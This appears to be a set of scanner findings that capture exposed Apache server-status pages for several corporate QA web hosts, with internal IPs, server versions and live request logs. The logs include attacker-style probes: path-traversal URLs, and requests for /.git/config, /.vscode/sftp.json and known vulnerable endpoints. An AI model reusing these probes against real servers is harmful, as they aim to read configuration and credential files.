0.00601384480.00.0018.78 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-058330/3/1835_ 0.003401078010.00.0026.81 10.253.106.161http/1.1 30-0282880/11/1096R 0.0364931890390.00.1016.35 10.253.106.161http/1.1 31-069840/0/1074_ 0.00601383010.00.0026.76 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 32-069850/0/1441_ 0.0060834910.00.0039.42 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 33-041670/4/1093R 0.005250897100.00.0521.10 10.253.106.161http/1.1 34-069860/0/1220_ 0.0050963410.00.0019.31 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 35-060960/0/1910R 0.0041403994800.00.0020.53 10.253.106.216http/1.1 36-011081/21/896K 0.13801605900.90.3511.08 10.253.106.161http/1.1www-qa.patheon.jp:80GET / HTTP/1.1 37-0282900/66/1109R 0.1442201364600.00.7123.90 10.253.106.216http/1.1 38-069870/0/1161_ 0.0050862020.00.0024.04 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 39-069880/0/1210_ 0.00501279350.00.0024.47 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 40-06690/6/1676R 0.0136217301544480.00.0542.30 10.253.106.216http/1.1 41-061030/0/1032R 0.0037701250530.00.0018.64 10.253.106.216http/1.1 42-069890/0/1289_ 0.00501530020.00.0023.32 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-034400/16/1227R 0.02650121421490.00.0323.38 10.253.106.161http/1.1 44-069900/0/1201_ 0.00501306640.00.0016.85 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-069910/0/1207_ 0.0050952820.00.0027.68 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-061060/5/1310R 0.00667101255790.00.0128.47 10.253.106.161http/1.1 47-061070/0/1139R 0.0037701316650.00.0016.00 10.253.106.161http/1.1 48-061080/0/1089R 0.0039901275180.00.0066.84 10.253.106.216http/1.1 49-069920/0/1183_ 0.00501747160.00.0043.86 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-069930/0/1055_ 0.0050877360.00.0022.49 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 51-015280/11/1025R 0.0170441275190.00.0520.92 10.253.106.161http/1.1 52-06710/0/1275R 0.0052701243370.00.0022.37 10.253.106.161http/1.1 53-061090/0/1165R 0.0037701626220.00.0032.83 10.253.106.216http/1.1 54-069940/0/1394_ 0.00401647840.00.0023.17 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c79bcde2a
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 23-Aug-2023 02:29:58 EDT Restart Time: Tuesday, 15-Aug-2023 10:38:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 15 hours 51 minutes 35 seconds Server load: 0.00 0.00 0.00 Total accesses: 212827 - Total Traffic: 2.1 GB - Total Duration: 9327913 CPU Usage: u50.72 s90.72 cu269.19 cs71.43 - .0728% CPU load .322 requests/sec - 3393 B/second - 10.3 kB/request - 43.8286 ms/request 37 requests currently being processed, 33 idle workers R_RKKR_RR__K__R__RRK_R____K___RRR__RRR_R_K____RRRK_RR.RR....KR__ R...W_.R_R___R_................................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0151360/21/1052R 0.1313301838600.00.4261.63 10.253.106.216http/1.1 1-0196600/16/1165_ 0.01133241589460.00.0345.78 10.253.106.161http/1.1 2-0151380/2/1034R 0.0139701385060.00.0242.95 10.253.106.161http/1.1 3-017261654/66190/66190K 40.152040261121281.8118.44118.44 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-017262653/66189/66189K 40.209040048121279.5118.44118.44 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-0151750/26/1242R 0.071330898610.01.6927.83 10.253.106.216http/1.1 6-0222480/0/1098_ 0.0040820610.00.0016.82 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-0151850/17/1115R 0.0365516634240.00.0727.73 10.253.106.216http/1.1 8-0120000/16/1211R 0.051777951488820.00.1647.42 10.253.106.161http/1.1 9-0196640/7/1124_ 0.001331187985000.00.1030.94 10.253.106.161http/1.1 10-0148390/21/1099_ 0.0312501551300.00.1923.40 10.253.106.216http/1.1 11-0214198/8/1414K 0.000412989214.10.0132.28 10.253.106.161http/1.1www-qa.patheon.jp:80GET /server-status HTTP/1.1 12-0222490/0/1207_ 0.0030855950.00.0025.63 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 13-0214230/3/1185_ 0.0013301455550.00.0028.40 10.253.106.161http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/print.min.2020.1.0.css HT 14-0214240/0/1142R 0.001340798730.00.0021.04 10.253.106.161http/1.1 15-0222500/0/1362_ 0.00302543040.00.0032.87 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 16-0222510/0/1099_ 0.0020926770.00.0024.60 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 17-0214250/0/816R 0.001340871290.00.0012.88 10.253.106.216http/1.1 18-0214260/0/1143R 0.0013401850730.00.0021.46 10.253.106.216http/1.1 19-0189661/2/1284K 0.005421555170.80.0015.07 10.253.106.161http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 20-0222520/0/1037_ 0.00201261930.00.0020.87 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0169850/5/1190R 0.003504601817360.00.1046.24 10.253.106.216http/1.1 22-0222530/0/1047_ 0.00201140970.00.0018.28 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0222540/0/1169_ 0.00201935180.00.0026.76 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0186350/7/1092_ 0.001100935050.00.0221.99 10.253.106.161http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/print.min.2023.7.1.428.cs 25-0222550/0/1177_ 0.0010904500.00.0015.21 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-0148431/2/964K 0.00211750070.80.0012.97 10.253.106.216http/1.1qa1-corporate.thermofisher.com:GET /.vscode/sftp.json HTTP/1.1 27-0222560/0/1054_ 0.00101919100.00.0020.03 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-0222570/0/926_ 0.00101361410.00.0017.77 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-095850/80/1725_ 0.101330994730.01.5925.83 10.253.106.161http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.2020. 30-0218580/0/979R 0.0043401495970.00.0015.09 10.253.106.161http/1.1 31-0158600/0/959R 0.0048201354050.00.0024.58 10.253.106.161http/1.1 32-0204260/1/1203R 0.0067711772360.00.0030.98 10.253.106.216http/1.1 33-0222580/0/1003_ 0.0010866190.00.0020.73 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-0222590/0/1024_ 0.0010658070.00.0014.87 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 35-0218610/0/1743R 0.0043403895270.00.0017.47 10.253.106.216http/1.1 36-0204280/3/812R 0.0065591517810.00.0610.52 10.253.106.161http/1.1 37-0218620/0/965R 0.0043401242400.00.0022.33 10.253.106.216http/1.1 38-0204290/0/1075_ 0.001250817210.00.0023.56 10.253.106.161http/1.1 39-0218630/0/1045R 0.004340928510.00.0020.28 10.253.106.161http/1.1 40-0186400/6/1512_ 0.0011001401610.00.0135.35 10.253.106.161http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.2023.7.1. 41-0218642/2/892K 0.005421173781.80.0014.06 10.253.106.161http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 42-0204310/3/1145_ 0.0011001448390.00.0120.29 10.253.106.216http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2023.7.1.4 43-0204320/1/1083_ 0.00125121052980.00.0020.49 10.253.106.161http/1.1 44-0222600/0/1075_ 0.00101158110.00.0015.95 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-0222610/0/1012_ 0.0010878110.00.0022.88 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-0218680/0/1222R 0.0042901234790.00.0026.98 10.253.106.161http/1.1 47-0187000/6/967R 0.0065501113600.00.0410.83 10.253.106.216http/1.1 48-0218690/0/1012R 0.0042801263910.00.0066.67 10.253.106.216http/1.1 49-02187014/14/1027K 0.010316743222.70.0240.09 10.253.106.216http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 50-0222620/0/897_ 0.0010570310.00.0017.50 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 51-0158680/14/877R 0.0213401230430.00.1519.45 10.253.106.216http/1.1 52-0130480/24/1191R 0.03569431179400.00.1219.49 10.253.106.161http/1.1 53-0-0/0/946. 0.002453
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c964f57c0
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 21-Aug-2023 20:18:45 EDT Restart Time: Tuesday, 15-Aug-2023 10:38:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 6 days 9 hours 40 minutes 22 seconds Server load: 0.00 0.00 0.00 Total accesses: 177339 - Total Traffic: 1.8 GB - Total Duration: 8265632 CPU Usage: u44.85 s76.41 cu223.21 cs58.11 - .0728% CPU load .321 requests/sec - 3526 B/second - 10.7 kB/request - 46.6092 ms/request 68 requests currently being processed, 30 idle workers K_RKKK__KKRKKRRKKKKKK_K_RRKRKKRKRKRRKKKRKR_RRKKRR_RKRRKRKRRKRR_K KRRKR__KRRR_WK_K__________________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0140191/1/832K 0.0075903164605220.30.2260.02 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/sites.html HTTP/1.1 1-0121720/5/922_ 0.01749771369550.00.0241.04 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c% 2-099330/52/883R 0.07353141327400.02.0641.64 10.253.106.216http/1.1 3-01726155322/55322/55322K 33.498033597101331.798.9698.96 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-01726255322/55322/55322K 33.545033435101331.298.9698.96 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-0121761/3/1022K 0.01848785687616.40.0222.00 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/large-molecule.html HTTP/1.1 6-0106790/80/957_ 0.10047736290.00.1513.99 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /.git/config HTTP/1.1 7-0123730/13/937_ 0.0228589630.00.1223.88 10.253.106.216http/1.1www-qa.patheon.jp:80GET /.git/config HTTP/1.1 8-0131254/11/963K 0.0110237713437334.80.0444.17 10.253.106.161http/1.1www-qa.patheon.cn:80GET /our-capabilities HTTP/1.1 9-0106862/15/817K 0.021023586929334.20.0521.81 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/home/terms-of-use.html HTTP/1.1 10-0123740/14/903R 0.0147941433510.00.0219.63 10.253.106.161http/1.1 11-0140291/1/1161K 0.018442411385513.80.0128.52 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/meet-the-experts.html HTTP/1.1 12-0140301/1/992K 0.00757668021320.70.0223.54 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/about-us.html HTTP/1.1 13-074210/60/973R 0.24349121381220.02.2224.70 10.253.106.216http/1.1 14-0106920/11/937R 0.0046913557890.00.0114.49 10.253.106.161http/1.1 15-0140431/1/1156K 0.017562024213818.10.0231.09 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/innovative-solutions/manufacturing.html HTTP/1.1 16-025371/9/947K 0.01839458552913.60.0216.23 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/about-us/contact-us.html HTTP/1.1 17-0110551/25/679K 0.02842297752814.60.0411.06 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/global-network.html HTTP/1.1 18-0140472/2/880K 0.0163514718522.40.0216.36 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?mg 19-01404817/17/1085K 0.0234614270249.40.0513.38 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /_all_dbs HTTP/1.1 20-0140491/1/864K 0.0010229411827489.00.0919.34 10.253.106.161http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 21-0140680/5/992_ 0.05391678200.00.1245.49 10.253.106.161http/1.1www-qa.patheon.jp:80GET /.git/config HTTP/1.1 22-089872/23/762K 0.039719134016.80.0412.44 10.253.106.161http/1.1qa1.allergyinsider.com:80POST /texteditor.php HTTP/1.1 23-0123750/8/944_ 0.018451615010.00.0220.16 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /photoalbum/index.php?url=../../../../../../../../../../../ 24-091500/14/910R 0.0131315805450.00.0217.25 10.253.106.161http/1.1 25-081530/10/1046R 0.013862807240.00.0314.48 10.253.106.216http/1.1 26-091842/14/775K 0.03662875741238.20.0811.56 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/advanced-therapies.html HTTP/1.1 27-0123780/5/863R 0.00180141837550.00.0114.47 10.253.106.216http/1.1 28-091852/15/755K 0.047505511806525.20.0915.32 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/commercial-services.html HTTP/1.1 29-0123817/28/1416K 0.047948187310.00.9221.29 10.253.106.161http/1.1qa1.allergyinsider.com:80POST /op/op.Login.php HTTP/1.1 30-0110980/13/798R 0.01486131269060.00.0212.30 10.253.106.161http/1.1 31-0140771/1/795K 0.017477912909019.50.0221.90 10.253.106.161http/1.1www-qa.patheon.cn:80GET /innovative-solutions HTTP/1.1 32-081570/23/1018R 0.153508647650.00.4425.32 10.253.106.216http/1.1 33-0110991/29/844K 0.0213170607466.10.4914.22 10.253.106.216http/1.1www-qa.patheon.cn:80GET /etc.clientlibs/multisitecommons/clientlibs/vendor/less.min 34-0140780/0/867R 0.00120578750.00.0013.77 10.253.106.161http/1.1 35-0108270/16/1614R 0.0138343729690.00.0415.48 10.253.106.216http/1.1 36-01238237/41/690K 0.04012131709298.80.309.02 10.253.106.216http/1.1www-qa.patheon.cn:80GET /about HTTP/1.1 37-0131267/11/846K 0.028348311351836.90.0420.89 10.253.106.161http/1.1www-qa.patheon.jp:80GET /home HTTP/1.1 38-0140791/1/871K 0.001037625321.50.0019.39 10.253.106.161http/1.1qa1.allergyinsider.com:80POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1 39-0140800/0/827R 0.00110787220.00.0018.01 10.253.106.161http/1.1 40-0964610/46/1156K 0.0821111686752.20.2534.08 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /telescope/requests HTTP/1.1 41-0108480/25/701R 0.0233151028680.00.039.85 10.253.106.161http/1.1 42-096500/62/1002_ 0.533121336700.01.3615.87 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /.git/config HTTP/1.1 43-029680/38/962R 0.34362121029360.01.0619.37 10.253.106.161http/1.1 44-096510/16/926R 0.0138331062260.00.0212.48 10.253.106.216http/1.1 45-053281/18/866K 0.041020168139189.00.2620.60 10.253.106.161http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 46-01270520/30/969K 0.0633410610192.40.1021.62 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 47-096530/20/890R 0.1836391051230.00.4010.41 10.253.106.216http/1.1 48-0131270/1/896R 0.0036001239640.00.0065.48 10.253.106.161http/1.1 49-0279290/105/936_ 0.883131594820.03.2339.83 10.253.106.161http/1.1qa1.allergyinsider.com:80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c4a43017d
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 21-Aug-2023 20:18:45 EDT Restart Time: Tuesday, 15-Aug-2023 10:38:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 6 days 9 hours 40 minutes 22 seconds Server load: 0.00 0.00 0.00 Total accesses: 177347 - Total Traffic: 1.8 GB - Total Duration: 8265781 CPU Usage: u44.86 s76.42 cu223.21 cs58.11 - .0728% CPU load .321 requests/sec - 3526 B/second - 10.7 kB/request - 46.608 ms/request 68 requests currently being processed, 30 idle workers K_RKKK__KKRKKRRKKKKKK_K_RRKRKKRKRKRRWKKRKR_RRKKRR_RKRRKRKRRKRR_K KRRKR_KKRRR_KK____________________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0140191/1/832K 0.0075903164605220.30.2260.02 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/sites.html HTTP/1.1 1-0121720/5/922_ 0.01749771369550.00.0241.04 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c% 2-099330/52/883R 0.07353141327400.02.0641.64 10.253.106.216http/1.1 3-01726155322/55322/55322K 33.498033597101331.798.9698.96 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-01726255322/55322/55322K 33.545033435101331.298.9698.96 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-0121761/3/1022K 0.01848785687616.40.0222.00 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/large-molecule.html HTTP/1.1 6-0106790/80/957_ 0.10047736290.00.1513.99 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /.git/config HTTP/1.1 7-0123730/13/937_ 0.0238589630.00.1223.88 10.253.106.216http/1.1www-qa.patheon.jp:80GET /.git/config HTTP/1.1 8-0131254/11/963K 0.0111237713437334.80.0444.17 10.253.106.161http/1.1www-qa.patheon.cn:80GET /our-capabilities HTTP/1.1 9-0106862/15/817K 0.021023586929334.20.0521.81 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/home/terms-of-use.html HTTP/1.1 10-0123740/14/903R 0.0147941433510.00.0219.63 10.253.106.161http/1.1 11-0140291/1/1161K 0.018442411385513.80.0128.52 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/meet-the-experts.html HTTP/1.1 12-0140301/1/992K 0.00757668021320.70.0223.54 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/about-us.html HTTP/1.1 13-074210/60/973R 0.24349121381220.02.2224.70 10.253.106.216http/1.1 14-0106920/11/937R 0.0046913557890.00.0114.49 10.253.106.161http/1.1 15-0140431/1/1156K 0.017562024213818.10.0231.09 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/innovative-solutions/manufacturing.html HTTP/1.1 16-025371/9/947K 0.01839458552913.60.0216.23 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/about-us/contact-us.html HTTP/1.1 17-0110551/25/679K 0.02842297752814.60.0411.06 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/global-network.html HTTP/1.1 18-0140472/2/880K 0.0163514718522.40.0216.36 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?mg 19-01404817/17/1085K 0.0234614270249.40.0513.38 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /_all_dbs HTTP/1.1 20-0140491/1/864K 0.0010229411827489.00.0919.34 10.253.106.161http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 21-0140680/5/992_ 0.05391678200.00.1245.49 10.253.106.161http/1.1www-qa.patheon.jp:80GET /.git/config HTTP/1.1 22-089872/23/762K 0.039719134016.80.0412.44 10.253.106.161http/1.1qa1.allergyinsider.com:80POST /texteditor.php HTTP/1.1 23-0123750/8/944_ 0.018451615010.00.0220.16 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /photoalbum/index.php?url=../../../../../../../../../../../ 24-091500/14/910R 0.0131315805450.00.0217.25 10.253.106.161http/1.1 25-081530/10/1046R 0.013862807240.00.0314.48 10.253.106.216http/1.1 26-091842/14/775K 0.03662875741238.20.0811.56 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/advanced-therapies.html HTTP/1.1 27-0123780/5/863R 0.00180141837550.00.0114.47 10.253.106.216http/1.1 28-091852/15/755K 0.048505511806525.20.0915.32 10.253.106.161http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/commercial-services.html HTTP/1.1 29-0123817/28/1416K 0.047948187310.00.9221.29 10.253.106.161http/1.1qa1.allergyinsider.com:80POST /op/op.Login.php HTTP/1.1 30-0110980/13/798R 0.01486131269060.00.0212.30 10.253.106.161http/1.1 31-0140771/1/795K 0.017477912909019.50.0221.90 10.253.106.161http/1.1www-qa.patheon.cn:80GET /innovative-solutions HTTP/1.1 32-081570/23/1018R 0.153508647650.00.4425.32 10.253.106.216http/1.1 33-0110991/29/844K 0.0213170607466.10.4914.22 10.253.106.216http/1.1www-qa.patheon.cn:80GET /etc.clientlibs/multisitecommons/clientlibs/vendor/less.min 34-0140780/0/867R 0.00120578750.00.0013.77 10.253.106.161http/1.1 35-0108270/16/1614R 0.0138343729690.00.0415.48 10.253.106.216http/1.1 36-01238238/42/691W 0.0600131725299.50.309.02 10.253.106.216http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 37-0131267/11/846K 0.028348311351836.90.0420.89 10.253.106.161http/1.1www-qa.patheon.jp:80GET /home HTTP/1.1 38-0140791/1/871K 0.001037625321.50.0019.39 10.253.106.161http/1.1qa1.allergyinsider.com:80POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1 39-0140800/0/827R 0.00110787220.00.0018.01 10.253.106.161http/1.1 40-0964610/46/1156K 0.0821111686752.20.2534.08 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /telescope/requests HTTP/1.1 41-0108480/25/701R 0.0233151028680.00.039.85 10.253.106.161http/1.1 42-096500/62/1002_ 0.533121336700.01.3615.87 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /.git/config HTTP/1.1 43-029680/38/962R 0.34362121029360.01.0619.37 10.253.106.161http/1.1 44-096510/16/926R 0.0138331062260.00.0212.48 10.253.106.216http/1.1 45-053281/18/866K 0.041120168139189.00.2620.60 10.253.106.161http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 46-01270520/30/969K 0.0633410610192.40.1021.62 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 47-096530/20/890R 0.1836391051230.00.4010.41 10.253.106.216http/1.1 48-0131270/1/896R 0.0036001239640.00.0065.48 10.253.106.161http/1.1 49-0279290/105/936_ 0.883131594820.03.2339.83 10.253.106.161http/1.1qa1.allergyinsider.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c60c003d5
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 28-Jun-2023 15:14:49 EDT Restart Time: Wednesday, 28-Jun-2023 15:00:05 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 14 minutes 43 seconds Server load: 0.25 0.07 0.03 Total accesses: 1019 - Total Traffic: 23.0 MB - Total Duration: 1539113 CPU Usage: u1.2 s.62 cu.09 cs.08 - .225% CPU load 1.15 requests/sec - 26.7 kB/second - 23.1 kB/request - 1510.42 ms/request 163 requests currently being processed, 41 idle workers KKKWKKKKKKK_____RK_RRRKRRKKKRKKKKRKKKKRRRRRRKKRRKKKKKKK_KKKKKKKK KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK KRKKKKKKKKKKKKKKKKK_KKKKKKKKKKKKKKRK.KKR............K....___KKC_ _____________________________................................... ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0785289/89/89K 0.040051132.50.130.13 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 1-0785389/89/89K 0.043055132.10.130.13 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 2-078549/70/70K 0.126157591639937.40.240.24 10.253.106.180http/1.1www-qa.patheon.cn:80GET /global-network HTTP/1.1 3-0785554/220/220W 0.250055621181.50.480.48 10.253.106.199http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 4-078561/2/2K 0.005880311606816.30.330.33 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/large-molecule.html HTTP/1.1 5-078574/4/4K 0.0030428524.10.020.02 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /diagnostic-education/etc/designs/diagnostics/vendor/font-a 6-078581/1/1K 0.0155116822336416.80.020.02 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/commercial-services.html HTTP/1.1 7-078594/4/4K 0.0144037350653.30.640.64 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /etc.clientlibs/tfsite/clientlibs/clientlib-site.min.css HT 8-078601/1/1K 0.00633367673489.60.090.09 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/newsroom/thermo-fisher-scientific-opens-viral-vector 9-078613/3/3K 0.0151502927222.90.020.02 10.253.106.180http/1.1www-qa.patheon.kr:80GET /akamai/sureroute-test-object.html HTTP/1.1 10-078621/1/1K 0.01304112221.90.020.02 10.253.106.199http/1.1qa1-chemicals.thermofisher.co.kGET /diagnostic-education/etc/designs/diagnostics/vendor/bootst 16-078680/0/0R 0.00537000.00.000.00 10.253.106.180http/1.1 17-078694/4/4K 0.00259088447.20.050.05 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET / HTTP/1.1 18-078700/2/2_ 0.00016580.00.000.00 10.253.106.180http/1.1qa1-chemicals.thermofisher.co.kGET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 19-078710/0/0R 0.00536000.00.000.00 10.253.106.180http/1.1 20-078720/0/0R 0.00536000.00.000.00 10.253.106.199http/1.1 21-078730/0/0R 0.00536000.00.000.00 10.253.106.199http/1.1 22-078744/4/4K 0.002291311617.00.020.02 10.253.106.180http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 23-078750/0/0R 0.00535000.00.000.00 10.253.106.180http/1.1 24-078760/0/0R 0.00536000.00.000.00 10.253.106.199http/1.1 25-085191/1/2K 0.01624387877514.60.010.01 10.253.106.180http/1.1www-qa.patheon.com:80GET /us/en/home.html HTTP/1.1 26-078782/2/2K 0.016066381330515.80.020.02 